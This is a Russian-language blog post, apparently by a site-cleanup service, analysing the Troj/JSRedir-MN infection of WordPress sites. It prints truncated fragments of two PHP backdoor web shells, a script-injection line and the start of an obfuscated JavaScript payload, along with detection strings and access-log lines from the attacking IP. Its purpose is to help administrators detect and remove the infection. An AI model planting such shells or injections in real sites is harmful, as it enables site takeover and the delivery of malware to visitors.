ENG    РУС

Все заметки блога »

Вирус Troj/JSRedir-MN c IP 5.39.47.1

Закажите лечение сайта и защиту от взлома у специалистов

Особенностью вируса Troj/JSRedir-MN является то, что его код постоянно перекачевывает из одного .js файла в другой, меняется имя вредоносного скрипта, его расположения и вставки document.write(‘<script…’), которая его подгружает на странице.

Управление вирусным кодом ведется извне через размещенные на сайте бэкдоры (небольшие хакерские .php скрипты). Их 2 вида:

Первый:

<?php if (md5($_POST['p']) == '22f753d8488619cb1026e0d3c427b195') { preg_replace($_POST['v1'], $_POST['v2'], $_POS…

Его можно обнаружить по фрагменту
preg_replace($_POST['v1'], $_POST['v2'

Второй:

<?php $auth_pass='ec31007f3c9dbfa0f422567ce3550c67';preg_replace("/.*/e',chr(101).chr(118).chr(97).chr(108).chr(40).chr(103).chr(122).chr(105).ch

Его можно найти по фрагменту
preg_replace("/.*/e',chr(101)

Местоположение этих двух видов шеллов постоянное. А вот вирусный код перемещается из одного файла .js  в другой.

Вставку можно найти по строке
scr”+”ipt

И выглядит она примерно так:
document.write("<scr"+"ipt src='/wp-content/themes/GameNation/horseman.js'>

А сам вирусный .js Troj/JSRedir-MN обфусцирован:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29…

Кроме того, на сервере встречается .swf файл размером около 2.5kb, который также перемещается из одного каталога в другой и меняет название.

Если посмотреть в логи веб-сервера, то там видны обращения к указанным мини-шеллам с заметной периодичностью

5.39.47.1 - - [24/Feb/2014:03:42:57 +0400] "POST /wp-includes/images/smilies/icon_evil.php HTTP/1.0" 200 2 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"

5.39.47.1 - - [24/Feb/2014:03:42:57 +0400] "POST /wp-includes/images/smilies/icon_evil.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"

5.39.47.1 - - [24/Feb/2014:06:59:10 +0400] "POST /wp-includes/images/smilies/icon_evil.php HTTP/1.0" 200 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"

5.39.47.1 - - [24/Feb/2014:06:59:13 +0400] "POST /wp-includes/images/smilies/icon_evil.php HTTP/1.0" 200 52 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"

5.39.47.1 - - [24/Feb/2014:12:41:18 +0400] "POST /wp-includes/images/smilies/icon_evil.php HTTP/1.0" 200 2 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"

5.39.47.1 - - [24/Feb/2014:12:41:18 +0400] "POST /wp-includes/images/smilies/icon_evil.php HTTP/1.0" 200 51 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"

Интересный момент: на всех клиентский сайтах, на которых мы успели проанализировать логи запросов, они шли с IP адреса 5.39.47.1. По данным whois – это диапазон французского провайдера OVH.com, у которого сервера арендует iphoster.net. Проверьте, нет ли у вас запросов с данного IP?

 

P.S. Все вредоносные файлы трояна Troj/JSRedir-MN детектируюся скриптом AI-BOLIT.

 

Читайте другие заметки блога.

Обсуждаем!

Подпишитесь на RSS: